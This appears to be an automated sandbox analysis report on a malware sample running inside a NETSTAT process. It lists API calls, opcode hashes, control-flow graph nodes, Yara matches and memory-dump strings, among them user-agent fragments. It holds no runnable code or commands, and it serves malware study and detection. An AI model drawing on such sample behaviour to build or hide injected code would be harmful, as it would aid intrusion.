                                                      • Opcode ID: 0024f287092442c3bb48ea2141c5b692f14f792f62f28be91880a5ee56902452
                                                      • Instruction ID: c0110db3236046b4d88adcdcc8c9b9654a888b3ad077a791dfbcdf3b72c6c03f
                                                      • Opcode Fuzzy Hash: 0024f287092442c3bb48ea2141c5b692f14f792f62f28be91880a5ee56902452
                                                      • Instruction Fuzzy Hash: 7101C8B6D4221C7ADB01EBE48C81DEFBB7CEF81694F048068FA04AB100E5245E068BB1

                                                      Control-flow Graph

                                                      APIs
                                                      • PostThreadMessageW.USER32(41392M9L,00000111,00000000,00000000), ref: 03050F17
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2578681040.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3040000_NETSTAT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID: 41392M9L$41392M9L
                                                      • API String ID: 1836367815-3081274516
                                                      • Opcode ID: 5f059e09acaf8460cea2afea9dc498a40f04ac28128d920a3877ce4df33e98c5
                                                      • Instruction ID: 9b969924194a6cd8131f36c61b4fb9dc3f7746818c604ef642060c2b51836168
                                                      • Opcode Fuzzy Hash: 5f059e09acaf8460cea2afea9dc498a40f04ac28128d920a3877ce4df33e98c5
                                                      • Instruction Fuzzy Hash: B201B9B5D4225D7AEB11EBE19C81DEFBB7CDF81694F058064FA04AB140E5385F068BB2

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 552 3050e6c-3050e8c 553 3050ee6-3050ee9 call 3061dc0 552->553 554 3050e8e 552->554 556 3050eee-3050f0a 553->556 555 3050e90-3050e97 554->555 554->556 558 3050f0c-3050f1b PostThreadMessageW 556->558 559 3050f2a-3050f30 556->559 558->559 560 3050f1d-3050f27 558->560 560->559
                                                      APIs
                                                      • PostThreadMessageW.USER32(41392M9L,00000111,00000000,00000000), ref: 03050F17
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2578681040.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3040000_NETSTAT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID: 41392M9L$41392M9L
                                                      • API String ID: 1836367815-3081274516
                                                      • Opcode ID: c2149d54fbcb7a27ec8a3b033cbb497f4e253c512d907e33953bc0c9b9ad8a95
                                                      • Instruction ID: d0b2232c75cec3b28228c524dffbebccba4c1a559ff9651748b816dcdc9b8868
                                                      • Opcode Fuzzy Hash: c2149d54fbcb7a27ec8a3b033cbb497f4e253c512d907e33953bc0c9b9ad8a95
                                                      • Instruction Fuzzy Hash: 1801F776A4615D778B11CF949D819EEBBACEF41254B08C0E9FE04DB200E7264A0687E1
                                                      APIs
                                                      • PostThreadMessageW.USER32(41392M9L,00000111,00000000,00000000), ref: 03050F17
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2578681040.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3040000_NETSTAT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID: 41392M9L$41392M9L
                                                      • API String ID: 1836367815-3081274516
                                                      • Opcode ID: f642b4c908920e74acb01d33cfde92d15c6738d7b0689060c701193a75124f9c
                                                      • Instruction ID: 51efd74b3da51b917145e7da75c5aac46e892935f6dbdf11e58d3cf97ff2d064
                                                      • Opcode Fuzzy Hash: f642b4c908920e74acb01d33cfde92d15c6738d7b0689060c701193a75124f9c
                                                      • Instruction Fuzzy Hash: 67E08C26A4210EB69B1186D86C82CFFF7BCEE85B91F0480AAFE04E3100E1204A0547B1
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2578681040.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3040000_NETSTAT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InitializeUninitialize
                                                      • String ID: @J7<
                                                      • API String ID: 3442037557-2016760708
                                                      • Opcode ID: 978b4d7cb92aeeac9affc62e10f67c0d61431db467591ea583f1eca6845d463a
                                                      • Instruction ID: 67cd11f49c0e150a54d039ea0dbb53f42735e0d4d507522472836cf7a7ee1b04
                                                      • Opcode Fuzzy Hash: 978b4d7cb92aeeac9affc62e10f67c0d61431db467591ea583f1eca6845d463a
                                                      • Instruction Fuzzy Hash: CD313FB5A0060AAFDB00DFD8C8809EFB7B9BF88304B148559E905EB214D775EA458BA0
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2578681040.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3040000_NETSTAT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InitializeUninitialize
                                                      • String ID: @J7<
                                                      • API String ID: 3442037557-2016760708
                                                      • Opcode ID: 7e0f7648d3ed9cb0f58d444f79f3c4563d8b70a406b8dffcc5cb8f922ad922e8
                                                      • Instruction ID: 5689c3fdc9aa610abf7661ad34f27ca47206c20832297fc08b7c53bb606b5b83
                                                      • Opcode Fuzzy Hash: 7e0f7648d3ed9cb0f58d444f79f3c4563d8b70a406b8dffcc5cb8f922ad922e8
                                                      • Instruction Fuzzy Hash: 03312DB5A0060AEFDB10DFD8D8809EFB7B9BF88304B148559E905EB214D775EE05CBA0
                                                      APIs
                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 030546D2
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2578681040.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3040000_NETSTAT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Load
                                                      • String ID:
                                                      • API String ID: 2234796835-0
                                                      • Opcode ID: c7f79262a1279ad7f3a6a6c56d154fd397bb3487976ff7f1465a53fedcc8fb06
                                                      • Instruction ID: d698c099dded341952ad9a505753f66426850c7386b82cb4f4cb8898f3273e38
                                                      • Opcode Fuzzy Hash: c7f79262a1279ad7f3a6a6c56d154fd397bb3487976ff7f1465a53fedcc8fb06
                                                      • Instruction Fuzzy Hash: DC0121BAE4120DABDF10EBE5DC41FDEB3B89B54208F044195ED08AB245F631E754CB92
                                                      APIs
                                                      • CreateProcessInternalW.KERNELBASE(?,?,?,?,0305848E,00000010,?,?,?,00000044,?,00000010,0305848E,?,?,?), ref: 030699A0
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2578681040.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3040000_NETSTAT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateInternalProcess
                                                      • String ID:
                                                      • API String ID: 2186235152-0
                                                      • Opcode ID: f5804be0c8644d8da80f2979e432fbf6f5ffe03a5844d5482ba4f2fe451744a2
                                                      • Instruction ID: c02feebf8da52aa678a410cc9af0de38154755277f3b02411f6961542b8cf608
                                                      • Opcode Fuzzy Hash: f5804be0c8644d8da80f2979e432fbf6f5ffe03a5844d5482ba4f2fe451744a2
                                                      • Instruction Fuzzy Hash: 960180B6205608BBDB44DE99DC80EEB77ADEF8C754F418208BA19E7244D630F851CBA4
                                                      APIs
                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03049B65
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2578681040.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3040000_NETSTAT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateThread
                                                      • String ID:
                                                      • API String ID: 2422867632-0
                                                      • Opcode ID: ae3a7e3f1d63bed824a21bfba6872ff91838c35e2be30c2d9bf0105260dc4a77
                                                      • Instruction ID: 6f4806f69104103708cfdac2b709f97654079cbf89198f2f53da8eddd5cc344d
                                                      • Opcode Fuzzy Hash: ae3a7e3f1d63bed824a21bfba6872ff91838c35e2be30c2d9bf0105260dc4a77
                                                      • Instruction Fuzzy Hash: D9F039B728131436E220A6E9AC02FDBA69C8BC0AA1F140466F70CEB280D995B54146E4
                                                      APIs
                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03049B65
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2578681040.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3040000_NETSTAT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateThread
                                                      • String ID:
                                                      • API String ID: 2422867632-0
                                                      • Opcode ID: 228a461bdf4974414d1e89f0d8064c9c67cc85202c6688111f062804b3b1ab93
                                                      • Instruction ID: 8c37152c943649961412c4a48d75025bd16a6738de460c252be9cb1d7120a45f
                                                      • Opcode Fuzzy Hash: 228a461bdf4974414d1e89f0d8064c9c67cc85202c6688111f062804b3b1ab93
                                                      • Instruction Fuzzy Hash: ADF092BA28131436E230A2A99C02FEB769CCFC0FA0F140525F70DEF2C0D995B98146F8
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(03051B39,?,03065D10,03051B39,0306584E,03065D10,?,03051B39,0306584E,00001000,?,?,00000000), ref: 0306989F
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2578681040.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3040000_NETSTAT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: a08255aaee45357fd6867a322680c5f9a97fab7e337603195b2343d66e074e34
                                                      • Instruction ID: 82a76973261dccf2dc780ed0efa438a6ea86ed1aa5cc1697a0ae59c287dd784d
                                                      • Opcode Fuzzy Hash: a08255aaee45357fd6867a322680c5f9a97fab7e337603195b2343d66e074e34
                                                      • Instruction Fuzzy Hash: 43E065B66003087BCA14EE59DC41EEB33ADEFC8750F008018F908AB241D7B0BD108AB8
                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,F85D8BCA,00000007,00000000,00000004,00000000,03053EE5,000000F4), ref: 030698EC
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2578681040.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3040000_NETSTAT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID:
                                                      • API String ID: 3298025750-0
                                                      • Opcode ID: 1a998ab20a5bacbcc9c82fd52531f228d42c67c834812d489855736ad9a5cef6
                                                      • Instruction ID: 71843d0f0bc004e324a6c2734d8565ca3e40bb498e58745b54ba367bb204f471
                                                      • Opcode Fuzzy Hash: 1a998ab20a5bacbcc9c82fd52531f228d42c67c834812d489855736ad9a5cef6
                                                      • Instruction Fuzzy Hash: 34E065B62012047BC614EE59DC80FEB37ACEFC9790F004019FA08AB240C670B9118AB8
                                                      APIs
                                                      • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 030584FC
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2578681040.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3040000_NETSTAT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AttributesFile
                                                      • String ID:
                                                      • API String ID: 3188754299-0
                                                      • Opcode ID: f7db3c2d8492bcd982b7d47971c2e6cdb1c37da24ba5e1dda12d0dc67c727b6d
                                                      • Instruction ID: 5ecc6bfd0e59a3f74e3430da5f8108524ac00650f2c4f0558753ac1cc25b49a1
                                                      • Opcode Fuzzy Hash: f7db3c2d8492bcd982b7d47971c2e6cdb1c37da24ba5e1dda12d0dc67c727b6d
                                                      • Instruction Fuzzy Hash: 9EE04F7525130467EA64AAA89C49B66339C9B88764F288A60FD5DDB2C1E578F5018150
                                                      APIs
                                                      • SetErrorMode.KERNELBASE(00008003,?,?,03051E30,0306818F,0306584E,03051DF3), ref: 030582F3
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2578681040.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3040000_NETSTAT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorMode
                                                      • String ID:
                                                      • API String ID: 2340568224-0
                                                      • Opcode ID: 0fe1b5bf81f5b8b1bdb6ac18254a5b93029c669eb538dc4edc0b6e48313896ae
                                                      • Instruction ID: 04958355b9fd0c77c79a8dd0e1d77e8a3ac489cbece5ae2a2be6f190d4812f5f
                                                      • Opcode Fuzzy Hash: 0fe1b5bf81f5b8b1bdb6ac18254a5b93029c669eb538dc4edc0b6e48313896ae
                                                      • Instruction Fuzzy Hash: 8BD05EB96843043BF644E7A4DC07F9A32CC8B80694F084464BB0CDB2C2ED65F60085A5
                                                      APIs
                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 030546D2
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2578681040.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3040000_NETSTAT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Load
                                                      • String ID:
                                                      • API String ID: 2234796835-0
                                                      • Opcode ID: 1eaff62f132b2d4574e25089534a72a857e5d291535941d73eeaf9ea7437390d
                                                      • Instruction ID: d0841222e01ba7485c9f1bdeb4988ef65968a0ab4914524cdd250bb06d76fe3e
                                                      • Opcode Fuzzy Hash: 1eaff62f132b2d4574e25089534a72a857e5d291535941d73eeaf9ea7437390d
                                                      • Instruction Fuzzy Hash: DFD01270A4510A6AD740CA98CC42FAAFBA4DB49205F0403C4B90C9B191D5716984C751
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                      • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 3577bcac1b610f00da618013f3d5f10ad78465acb55b0498b73e8668e526c9bd
                                                      • Instruction ID: 21704dffb9f327f28d602b929168d657cc32960343870785edf606786a471765
                                                      • Opcode Fuzzy Hash: 3577bcac1b610f00da618013f3d5f10ad78465acb55b0498b73e8668e526c9bd
                                                      • Instruction Fuzzy Hash: 94B09B719055C5C5EA11F760460CB17794867D1741F19C4A1D2430741F4779D1D1E275
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581608341.0000000003710000.00000040.00000800.00020000.00000000.sdmp, Offset: 03710000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3710000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581608341.0000000003710000.00000040.00000800.00020000.00000000.sdmp, Offset: 03710000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3710000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .NE$ MSI$(com$.0.3$.0.5$.0C;$.5.3$0727$0729$0729$0; I$0; S$0; W$1; W$3; .$4.0 $; .N$; .N$; .N$; Me$; Tr$C 6.$Cent$E 7.$ET C$ET C$ET C$LCC2$LR 2$LR 3$LR 3$Mozi$NET4$OW64$SF@E$T 6.$T4.0$ZDR$ath.$ble;$dia $er P$iden$indo$lla/$nfoP$pati$t/4.$ws N
                                                      • API String ID: 0-559278899
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581608341.0000000003710000.00000040.00000800.00020000.00000000.sdmp, Offset: 03710000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3710000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                      • API String ID: 0-3754132690
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                       • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                                                       • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
                                                       • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                      • API String ID: 48624451-2108815105
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                       • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                                                       • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
                                                       • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                      • API String ID: 48624451-2108815105
                                                      Strings
                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03964742
                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 039646FC
                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 03964787
                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03964725
                                                      • ExecuteOptions, xrefs: 039646A0
                                                      • Execute=1, xrefs: 03964713
                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03964655
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                       • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                                                       • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
                                                       • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                      • API String ID: 0-484625025
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                       • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                                                       • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
                                                       • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                       • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                                                       • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
                                                       • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID: __aulldvrm
                                                      • String ID: +$-$0$0
                                                      • API String ID: 1302938615-699404926
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                       • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                                                       • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
                                                       • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: %%%u$[$]:%u
                                                      • API String ID: 48624451-2819853543
                                                      Strings
                                                      • RTL: Re-Waiting, xrefs: 0396031E
                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 039602BD
                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 039602E7
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                       • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                                                       • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
                                                       • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                      • API String ID: 0-2474120054
                                                      Strings
                                                      • RTL: Re-Waiting, xrefs: 03967BAC
                                                      • RTL: Resource at %p, xrefs: 03967B8E
                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03967B7F
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                       • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                                                       • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
                                                       • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                      • API String ID: 0-871070163
                                                      APIs
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0396728C
                                                      Strings
                                                      • RTL: Re-Waiting, xrefs: 039672C1
                                                      • RTL: Resource at %p, xrefs: 039672A3
                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03967294
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                       • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                                                       • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
                                                       • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                      • API String ID: 885266447-605551621
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                       • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                                                       • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
                                                       • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: %%%u$]:%u
                                                      • API String ID: 48624451-3050659472
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                       • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                                                       • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
                                                       • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID: __aulldvrm
                                                      • String ID: +$-
                                                      • API String ID: 1302938615-2137968064
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                       • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                                                       • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
                                                       • Associated: 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_38c0000_NETSTAT.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $$@
                                                      • API String ID: 0-1194432280
                                                      APIs
                                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 0397CFBD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                       • Associated: 0000000B.00000002.2581929956.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                                                       • Associated: 0000000B.00000002.2581929956.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
